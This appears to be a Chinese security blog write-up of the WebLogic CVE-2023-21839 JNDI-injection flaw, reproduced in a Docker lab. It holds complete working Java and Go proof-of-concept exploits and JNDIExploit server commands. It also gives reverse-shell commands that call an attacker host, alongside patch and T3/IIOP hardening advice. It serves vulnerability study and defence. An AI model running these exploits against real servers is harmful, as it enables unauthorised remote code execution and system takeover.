

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/flower.png">
  <link rel="icon" type="image/png" href="/img/flower.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="keep something">
  <meta name="author" content="luom">
  <meta name="keywords" content="">
  <title>Weblogic未授权远程代码执行漏洞 (CVE-2023-21839) - RC9&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"romanc9.github.io","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"nC7Rtx8EoAwWlShCEwdRsumO-gzGzoHsz","app_key":"sqlnn9nfpy9eU5bkSY3Rpkyb","server_url":"https://nc7rtx8e.lc-cn-n1-shared.com"}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Romanc9's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/post.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2023-03-27 17:53" pubdate>
        2023年3月27日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      41
       分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2024年3月4日 下午
                
              </p>
            
            <div class="markdown-body">
              <h2 id="漏洞简介">1.漏洞简介</h2>
<p>CVE-2023-21839 允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI
lookup 操作，当 JDK
版本过低或本地存在小工具（javaSerializedData）时，这可能会导致 RCE
漏洞</p>
<ul>
<li>WebLogic_Server = 12.2.1.3.0</li>
<li>WebLogic_Server = 12.2.1.4.0</li>
<li>WebLogic_Server = 14.1.1.0.0</li>
</ul>
<h2 id="漏洞原理">2.漏洞原理</h2>
<p>简单总结版：</p>
<blockquote>
<p>​ 由于Weblogic
IIOP/T3协议存在缺陷，当IIOP/T3协议开启时，未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求。<strong>主要风险点是lookup方法的使用。</strong></p>
<p>​ 漏洞原理其实是通过Weblogic
t3/iiop协议支持远程绑定对象bind到服务端，当远程对象继承自OpaqueReference时，lookup查看远程对象时，服务端调用远程对象getReferent方法，其中的<strong>remoteJNDIName参数可控</strong>，导致攻击者可利用rmi/ldap远程协议进行远程命令执行。</p>
</blockquote>
<p>参考📚：</p>
<blockquote>
<p>https://www.anquanke.com/post/id/287753</p>
<p>https://xz.aliyun.com/t/12297</p>
<p>ChatGPT源码分析：https://www.freebuf.com/vuls/359082.html</p>
<p>全英文：https://www.pingsafe.com/blog/cve-2023-21839-oracle-weblogic-server-core-patch-advisory</p>
<p>goby分析+流程图https://www.4hou.com/posts/6x67</p>
<p>https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md</p>
<p>https://nosec.org/home/detail/5079.html</p>
<p>源码追踪</p>
<p>https://xz.aliyun.com/t/12452</p>
</blockquote>
<h3 id="weblogic-t3协议的rmi调用原理">2.1 Weblogic
T3协议的RMI调用原理</h3>
<p>​
RMI允许在不同的Java虚拟机（JVM）之间进行通信，使得一个Java程序可以调用另一个Java程序中的方法</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202403041730528.png" srcset="/img/loading.gif" alt="RMI实现过程" style="zoom:50%;"></p>
<p>​</p>
<p>​ Weblogic RMI默认使用的传输协议是T3，无论是Java RMI还是Weblogic
RMI，都需要使用JNDI调用远端的RMI服务。</p>
<p>​
JNDI的查找一般使用lookup()方法。常规Weblogic漏洞在反序列化时触发，流量中的序列化数据没有校验完全，恶意数据被反序列化出Class对象，并调用构造函数，若构造函数里有关于命令执行的指令，远程代码执行即可实现。而本次分析的新漏洞触发在反序列化后的lookup()调用中。</p>
<p>​
<strong><u>CVE-2023-21839漏洞原理</u></strong>：绑定远程对象到服务端JNDI服务后，在客户端执行lookup操作时，如果远程对象为ForeignOpaqueReference，客户端查找时会触发服务端调用ForeignOpaqueReference.getReferent方法，该方法会执行lookup查找，通过可控remoteJNDIName参数构造LDAP服务器可以实现远程命令执行，流程图如下👇🏻</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202403041730529.png" srcset="/img/loading.gif" alt="CVE-2023-21839漏洞原理流程图" style="zoom:50%;"></p>
<p>​</p>
<h3 id="源码rce利用链">2.2 源码RCE利用链</h3>
<p>​
weblogic.deployment.jms.ForeignOpaqueReference类：继承于OpaqueReference接口，该接口用于在不同的JVM之间通过命名服务传递对象引用。当对象实现此接口，通过lookup检索WLContext时，命名服务会调用getReferent()
返回对象。</p>
<p>​
<strong>漏洞入口ForeignOpaqueReference.getReferent</strong>方法源码：</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202403041730530.png" srcset="/img/loading.gif" alt="漏洞入口getReferent方法部分源码" style="zoom:50%;"></p>
<p>​
1）首先检查JNDI环境，如果没有设置JNDI环境变量，则使用默认的InitialContext对象创建context。否则，则使用指定的this.jndiEnvironment通过InitialContext对象创建context，并检查java.naming.factory.initial属性：该属性指定JNDI实现的工厂类。jndiEnvironment是private属性，可通过反射赋值。</p>
<p>​ 2）retVal = context.lookup(evalMacros(this.remoteJNDIName));
通过远程JNDI名称查找并返回一个对象，然后将其赋值给变量retVal。remoteJNDIName是private属性，<strong>可通过反射赋值</strong></p>
<p><strong><u>那么构造漏洞利用代码：</u></strong></p>
<p>​
1）创建InitialContext对象，配置JNDI的接口连接Weblogic服务器的环境属性：指定目标服务器的URL地址和初始上下文工厂的实现类。</p>
<pre><code class="hljs reasonml">Hashtable env = <span class="hljs-keyword">new</span> <span class="hljs-constructor">Hashtable()</span>;
env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
env.put(Context.PROVIDER_URL, url);
InitialContext c = <span class="hljs-keyword">new</span> <span class="hljs-constructor">InitialContext(<span class="hljs-params">env</span>)</span>;</code></pre>
<p>​
2）利用反射赋值ForeignOpaqueReference对象中的jndiEnvironment和remoteJNDIName为LDAP服务器。</p>
<pre><code class="hljs reasonml">env.put(Context.INITIAL_CONTEXT_FACTORY,<span class="hljs-string">&quot;com.sun.jndi.rmi.registry.RegistryContextFactory&quot;</span>); <span class="hljs-comment">//设置java.naming.factory.initial属性</span>
Field jndiEnvironment = <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">ForeignOpaqueReference</span>.</span></span><span class="hljs-keyword">class</span>.get<span class="hljs-constructor">DeclaredField(<span class="hljs-string">&quot;jndiEnvironment&quot;</span>)</span>;
jndiEnvironment.set<span class="hljs-constructor">Accessible(<span class="hljs-params">true</span>)</span>;
jndiEnvironment.set(f, env);  <span class="hljs-comment">//jndiEnvironment赋值</span>
Field remoteJNDIName = <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">ForeignOpaqueReference</span>.</span></span><span class="hljs-keyword">class</span>.getDeclaredField (<span class="hljs-string">&quot;remoteJNDIName&quot;</span>);
remoteJNDIName.set<span class="hljs-constructor">Accessible(<span class="hljs-params">true</span>)</span>;
String ldap = <span class="hljs-string">&quot;ldap://xxx &quot;</span>;
remoteJNDIName.set(f, ldap); <span class="hljs-comment">//remoteJNDIName赋值</span></code></pre>
<p>​
3）调用InitialContext对象的bind方法将ForeignOpaqueReference对象绑定到JNDI服务，名称随机。</p>
<pre><code class="hljs reasonml">String bindName = <span class="hljs-keyword">new</span> <span class="hljs-constructor">Random(System.<span class="hljs-params">currentTimeMillis</span>()</span>).next<span class="hljs-constructor">Long()</span>+<span class="hljs-string">&quot;&quot;</span>;
c.bind(bindName,f);</code></pre>
<p>​
4）最后调用InitialContext对象的lookup方法：c.lookup(bindName)。JNDI服务就会查询绑定对象，触发访问远程LDAP服务器，借此实现远程代码执行。漏洞RCE利用链如下</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202403041730531.png" srcset="/img/loading.gif" alt="漏洞利用链" style="zoom:50%;"></p>
<p>​ 漏洞利用时，配合JNDIExploit
工具：JNDI攻击通过引用远程类加载，那么配合工具启动LDAP服务器，将客户端连接到本地LDAP服务器，发送有效载荷。</p>
<p>​ 该漏洞基于JNDI注入，<strong>由于JDK
8u121之后的版本默认com.sun.jndi.ldap.object.trustURLCodebase为false，关闭远程加载类库，无法RMI注入，但可以通过LDAP协议实现JNDI注入</strong>。<strong>而8u191之后的版本LDAP也被禁止，<u>所以Weblogic服务端Java版本过旧时RCE才能实现</u></strong></p>
<h2 id="漏洞复现">3.漏洞复现</h2>
<blockquote>
<p>jndi server利用工具：使用JNDIExploit.jar工具开启LDAP和WEB服务</p>
<p>https://github.com/WhiteHSBG/JNDIExploit</p>
<p>保姆级全教程：</p>
<p>https://bianchengsite.com/u0WeilTZFCR5-t0k6LF7RA</p>
</blockquote>
<p>目标机：Centos 7,java8,vps：1.xxx.xxx.172</p>
<p>搭建环境：</p>
<p>1.在vps靶机 docker上搭建<strong>Weblogic server
12.2.1.3环境</strong>【vulhub搭建的环境】</p>
<p>​ docker-compose.yml：</p>
<pre><code class="hljs groovy"><span class="hljs-attr">version:</span> <span class="hljs-string">&#x27;2&#x27;</span>
<span class="hljs-attr">services:</span>
<span class="hljs-attr">weblogic:</span>
<span class="hljs-attr">image:</span> vulhub/<span class="hljs-attr">weblogic:</span><span class="hljs-number">12.2</span><span class="hljs-number">.1</span><span class="hljs-number">.3</span><span class="hljs-number">-2018</span>
<span class="hljs-attr">ports:</span>
-<span class="hljs-string">&quot;7001:7001&quot;</span></code></pre>
<p>​ 定位到文件所在位置，终端输入命令</p>
<pre><code class="hljs awk">cd <span class="hljs-regexp">/root/</span>vulhub-master<span class="hljs-regexp">/weblogic/</span>CVE-<span class="hljs-number">2023</span>-<span class="hljs-number">21839</span>  <span class="hljs-regexp">//</span>vulhub搭建环境
cd CVE-<span class="hljs-number">2023</span>-<span class="hljs-number">21839</span>
docker-compose up -d</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202304151753405.png" srcset="/img/loading.gif" alt="启动docker环境" style="zoom:50%;"></p>
<p>2.攻击机访问http://1.xxx.xxx.172:7001/,进入后台http://1.xxx.xxx.172:7001/console/，环境搭建成功</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202304151755886.png" srcset="/img/loading.gif" alt="docker搭建"></p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202402131803357.png" srcset="/img/loading.gif" alt="weblogic环境搭建" style="zoom:50%;"></p>
<h3 id="poc1">poc1</h3>
<p>https://github.com/4ra1n/CVE-2023-21839</p>
<h4 id="漏洞探测">漏洞探测</h4>
<p>查看DNSlog网站访问记录即可判断漏洞是否存在。</p>
<p>攻击机运行poc</p>
<p>【内网docker靶机地址：172.17.0.1】</p>
<pre><code class="hljs angelscript">./poc2 -ip <span class="hljs-number">172.17</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span> -port <span class="hljs-number">7001</span> -ldap ldap:<span class="hljs-comment">//wpaat8.dnslog.cn</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202304161716296.png" srcset="/img/loading.gif" alt="运行poc" style="zoom:50%;"></p>
<p>dnslog存在回显，说明存在漏洞：</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202402131805506.png" srcset="/img/loading.gif" alt="image-20240213180551455" style="zoom: 33%;"></p>
<h4 id="本地利用拿shell">本地利用拿shell</h4>
<p>目标机：vps上本地docker搭建的weblogic环境，ip：172.17.0.1</p>
<p>攻击机：vps：1.xxx.xxx.172</p>
<p>搭建恶意jndiserver，位置：vps</p>
<blockquote>
<p>一款用于 <code>JNDI注入</code> 利用的工具，大量参考/引用了
<code>Rogue JNDI</code>
项目的代码，支持直接<code>植入内存shell</code>，并集成了常见的<code>bypass 高版本JDK</code>的方式，适用于与自动化工具配合使用。</p>
<p>https://github.com/WhiteHSBG/JNDIExploit</p>
</blockquote>
<p>vps运行jdni server，公网开启rmi服务</p>
<pre><code class="hljs css"><span class="hljs-selector-tag">java</span> <span class="hljs-selector-tag">-jar</span> <span class="hljs-selector-tag">JNDIExploit-1</span><span class="hljs-selector-class">.4-SNAPSHOT</span><span class="hljs-selector-class">.jar</span> <span class="hljs-selector-tag">-i</span> 1<span class="hljs-selector-class">.xxx</span><span class="hljs-selector-class">.xxx</span><span class="hljs-selector-class">.172</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202402161951377.png" srcset="/img/loading.gif" alt="开启jndi服务"></p>
<p><strong>⚠️注意搭建ldapserver的服务器需要开启1389和3456端口，否则无法收到目标机的请求</strong></p>
<p>vps本地监听5003端口，等待反弹shell</p>
<pre><code class="hljs angelscript">nc -lvvp <span class="hljs-number">5003</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202304161724373.png" srcset="/img/loading.gif" alt="本地监听5003端口" style="zoom:50%;"></p>
<p>go编译poc</p>
<p>go编译设置操作系统为linu【通过GOOS设置编译操作系统，使用GOARCH设置CPU架构，即编译后的二进制文件要在哪个操作系统的哪个CPU架构上运行】</p>
<pre><code class="hljs routeros">go build -o poc2 【mac】
<span class="hljs-attribute">GOOS</span>=linux <span class="hljs-attribute">GOARCH</span>=amd64 go build -o poc2</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202304161708621.png" srcset="/img/loading.gif" alt="go编译poc" style="zoom:50%;"></p>
<p>运行poc利用,反弹shell</p>
<pre><code class="hljs angelscript">./poc2 -ip <span class="hljs-number">172.17</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span> -port <span class="hljs-number">7001</span> -ldap ldap:<span class="hljs-comment">//1.xxx.172:1389/Basic/ReverseShell/1.xxx.172/5003</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202402161953411.png" srcset="/img/loading.gif" alt="运行poc"></p>
<p>ldap服务器收到请求</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202402161954253.png" srcset="/img/loading.gif" alt="ldap服务器" style="zoom:50%;"></p>
<p>监听端口拿到shell</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202402161955415.png" srcset="/img/loading.gif" alt="getshell" style="zoom:50%;"></p>
<h3 id="poc2">poc2</h3>
<p>https://github.com/DXask88MA/Weblogic-CVE-2023-21839</p>
<p>原始：</p>
<pre><code class="hljs java"><span class="hljs-keyword">import</span> javax.naming.Context;
<span class="hljs-keyword">import</span> javax.naming.InitialContext;
<span class="hljs-keyword">import</span> javax.naming.NamingException;
<span class="hljs-keyword">import</span> java.lang.reflect.Field;
<span class="hljs-keyword">import</span> java.util.Hashtable;


<span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">poc</span> </span>&#123;
    <span class="hljs-keyword">static</span> String JNDI_FACTORY=<span class="hljs-string">&quot;weblogic.jndi.WLInitialContextFactory&quot;</span>;
    <span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> InitialContext <span class="hljs-title">getInitialContext</span><span class="hljs-params">(String url)</span><span class="hljs-keyword">throws</span> NamingException</span>
<span class="hljs-function">    </span>&#123;
        Hashtable&lt;String,String&gt; env = <span class="hljs-keyword">new</span> Hashtable&lt;String,String&gt;();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> InitialContext(env);
    &#125;
    <span class="hljs-comment">//iiop</span>
    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String args[])</span> <span class="hljs-keyword">throws</span> Exception </span>&#123;
        InitialContext c=getInitialContext(<span class="hljs-string">&quot;t3://172.23.a.b:7001&quot;</span>);
        Hashtable&lt;String,String&gt; env = <span class="hljs-keyword">new</span> Hashtable&lt;String,String&gt;();

        env.put(Context.INITIAL_CONTEXT_FACTORY, <span class="hljs-string">&quot;com.sun.jndi.rmi.registry.RegistryContextFactory&quot;</span>);
        weblogic.deployment.jms.ForeignOpaqueReference f=<span class="hljs-keyword">new</span> weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField(<span class="hljs-string">&quot;jndiEnvironment&quot;</span>);
        jndiEnvironment.setAccessible(<span class="hljs-keyword">true</span>);
        jndiEnvironment.set(f,env);
        Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField(<span class="hljs-string">&quot;remoteJNDIName&quot;</span>);
        remoteJNDIName.setAccessible(<span class="hljs-keyword">true</span>);
        remoteJNDIName.set(f,<span class="hljs-string">&quot;ldap://172.23.c.d:1389/Basic/Command/calc&quot;</span>);
        c.bind(<span class="hljs-string">&quot;aaa120&quot;</span>,f);
        c.lookup(<span class="hljs-string">&quot;aaa120&quot;</span>);

    &#125;

&#125;</code></pre>
<p>大佬写的改版的：</p>
<pre><code class="hljs java"><span class="hljs-keyword">import</span> javax.naming.Context;
<span class="hljs-keyword">import</span> javax.naming.InitialContext;
<span class="hljs-keyword">import</span> javax.naming.NamingException;
<span class="hljs-keyword">import</span> java.lang.reflect.Field;
<span class="hljs-keyword">import</span> java.util.Hashtable;
<span class="hljs-keyword">import</span> java.util.Random;

<span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">CVE_2023_21839</span> </span>&#123;
    <span class="hljs-keyword">static</span> String JNDI_FACTORY=<span class="hljs-string">&quot;weblogic.jndi.WLInitialContextFactory&quot;</span>;
    <span class="hljs-keyword">static</span> String HOW_TO_USE=<span class="hljs-string">&quot;[*]java -jar 目标ip:端口 ldap地址\ne.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111&quot;</span>;

    <span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">static</span> InitialContext <span class="hljs-title">getInitialContext</span><span class="hljs-params">(String url)</span><span class="hljs-keyword">throws</span> NamingException</span>
<span class="hljs-function">    </span>&#123;
        Hashtable&lt;String,String&gt; env = <span class="hljs-keyword">new</span> Hashtable&lt;String,String&gt;();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> InitialContext(env);
    &#125;
    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String args[])</span> <span class="hljs-keyword">throws</span> Exception </span>&#123;
        <span class="hljs-keyword">if</span>(args.length &lt;<span class="hljs-number">2</span>)&#123;
            System.out.println(HOW_TO_USE);
            System.exit(<span class="hljs-number">0</span>);
        &#125;
        String t3Url = args[<span class="hljs-number">0</span>];
        String ldapUrl = args[<span class="hljs-number">1</span>];
        InitialContext c=getInitialContext(<span class="hljs-string">&quot;t3://&quot;</span>+t3Url);
        Hashtable&lt;String,String&gt; env = <span class="hljs-keyword">new</span> Hashtable&lt;String,String&gt;();
        env.put(Context.INITIAL_CONTEXT_FACTORY, <span class="hljs-string">&quot;com.sun.jndi.rmi.registry.RegistryContextFactory&quot;</span>);
        weblogic.deployment.jms.ForeignOpaqueReference f=<span class="hljs-keyword">new</span> weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField(<span class="hljs-string">&quot;jndiEnvironment&quot;</span>);
        jndiEnvironment.setAccessible(<span class="hljs-keyword">true</span>);
        jndiEnvironment.set(f,env);
        Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField(<span class="hljs-string">&quot;remoteJNDIName&quot;</span>);
        remoteJNDIName.setAccessible(<span class="hljs-keyword">true</span>);
        remoteJNDIName.set(f,ldapUrl);
        String bindName = <span class="hljs-keyword">new</span> Random(System.currentTimeMillis()).nextLong()+<span class="hljs-string">&quot;&quot;</span>;
        <span class="hljs-keyword">try</span>&#123;
            c.bind(bindName,f);
            c.lookup(bindName);
        &#125;<span class="hljs-keyword">catch</span>(Exception e)&#123; &#125;

    &#125;
&#125;</code></pre>
<p>poc使用方法：</p>
<p>​
编写并打包的EXP利用工具Weblogic-CVE-2023-21839.jar，然后使用<code>java -jar 目标IP:端口 LDAP地址</code></p>
<h4 id="漏洞探测-1">漏洞探测</h4>
<p>同理查看DNSlog网站访问记录即可判断漏洞是否存在。</p>
<p><strong>攻击者要记得使用<code>java8</code>的环境，不然会报错</strong></p>
<pre><code class="hljs angelscript">java -jar Weblogic-CVE<span class="hljs-number">-2023</span><span class="hljs-number">-21839.</span>jar <span class="hljs-number">172.17</span><span class="hljs-number">.0</span><span class="hljs-number">.1</span>:<span class="hljs-number">7001</span> ldap:<span class="hljs-comment">//o712i0.dnslog.cn</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202304161945367.png" srcset="/img/loading.gif" alt="漏洞探测" style="zoom:50%;"></p>
<h4 id="本地拿shell">本地拿shell</h4>
<p>攻击机类似前文搭建服jndi服务器，公网服务器centos本地监听5003端口，等待shell连接请求，然后运行如下命令：</p>
<pre><code class="hljs apache"><span class="hljs-attribute">java</span> -jar Weblogic-CVE-<span class="hljs-number">2023</span>-<span class="hljs-number">21839</span>.jar <span class="hljs-number">172.17.0.1:7001</span> ldap://<span class="hljs-number">1</span>.xxx.<span class="hljs-number">172</span>:<span class="hljs-number">1389</span>/Basic/ReverseShell/<span class="hljs-number">1</span>.xxx.<span class="hljs-number">172</span>/<span class="hljs-number">5003</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202402162004914.png" srcset="/img/loading.gif" alt="运行exp" style="zoom:50%;"></p>
<p>ldap服务器log记录：</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202402162006380.png" srcset="/img/loading.gif" alt="ldap服务器记录" style="zoom:50%;"></p>
<p>攻击机5003端口拿到靶机shell</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202402162012808.png" srcset="/img/loading.gif" alt="getshell" style="zoom:50%;"></p>
<h2 id="注意事项思考">4.注意事项&amp;思考</h2>
<p><strong>⚠️m1适配问题，docker weblogic环境搭建不起来</strong></p>
<p>​
本地测试的话里ldap服务设置的ip地址不要写0.0.0.0，要写公网服务器的IP/内网ip，不然无法获取到LDAP请求，弹shell弹不回来</p>
<p>多目标检测：</p>
<blockquote>
<p>https://github.com/4ra1n/CVE-2023-21839/pull/1/commits/f62071a9b93f270f335fc83f8560b8e1f646dc23</p>
</blockquote>
<h2 id="修复方案">5.修复方案</h2>
<p>1、安装Oracle WebLogic Server最新安全补丁：
https://www.oracle.com/security-alerts/cpujan2023.html</p>
<p>2、关闭T3和iiop协议端口</p>
<p><strong>漏洞利用T3协议进行攻击，如果程序不依赖T3协议进行JVM通信，通过阻断T3协议防止漏洞攻击是一种有效的防御措施。</strong>具体来说，可以通过以下方法来实现：</p>
<p>​ (1)禁用不必要的T3协议访问。可以通过配置WebLogic
Server控制台来限制T3协议的使用，在base_domain配置页面，连接筛选器只允许特定的IP地址或主机名访问T3协议。</p>
<p>​
(2)加强T3协议的安全性。可以通过加密和身份验证等措施来保护T3协议的安全性，例如使用SSL/TLS协议加密T3协议通信，或者使用用户名和高强度密码进行身份验证</p>
<p>操作方法参考：https://help.aliyun.com/noticelist/articleid/1060577901.html</p>
<p>3、IIOP（Internet Inter-ORB
Protocol）是一种面向对象的远程过程调用协议，用于在分布式系统中的对象之间进行通信。攻击者也可以利用IIOP协议的漏洞来执行恶意代码。为了防止利用IIOP协议漏洞攻击，可以通过关闭IIOP协议来实现。具体可采取以下措施：</p>
<p>​
(1)禁用IIOP协议：在应用服务器或者中间件中，可以通过配置文件或者管理界面禁用IIOP协议。如Weblogic控制台取消勾选IIOP选项。</p>
<p>​ (2)配置防火墙：在网络边界处配置防火墙，禁止IIOP协议的流量通过。</p>
<p>​
(3)更新软件版本：及时更新应用服务器或者中间件的软件版本，以修复已知的IIOP协议漏洞。</p>
<p>​
(4)加强访问控制：限制IIOP协议的访问权限，只允许授权的用户或者应用程序使用IIOP协议进行通信。</p>
<p>4、及时更新WebLogic Server。及时更新WebLogic
Server可以修复已知的漏洞，从而避免攻击者利用T3协议进行攻击。</p>
<h2 id="延伸参考">延伸参考</h2>
<p>宋雁鸣,步春红.加固中间件WebLogic服务安全[J].网络安全和信息化,2017,No.16(08):117-118.</p>
<p>周正,孙海波.基于“Weblogic远程代码执行漏洞”谈网络安全问题防范[J].广播电视网络,2021,28(04):56-58.</p>
<p>Running Oracle WebLogic on containers [O] . Borja Aparicio Cotarelo,
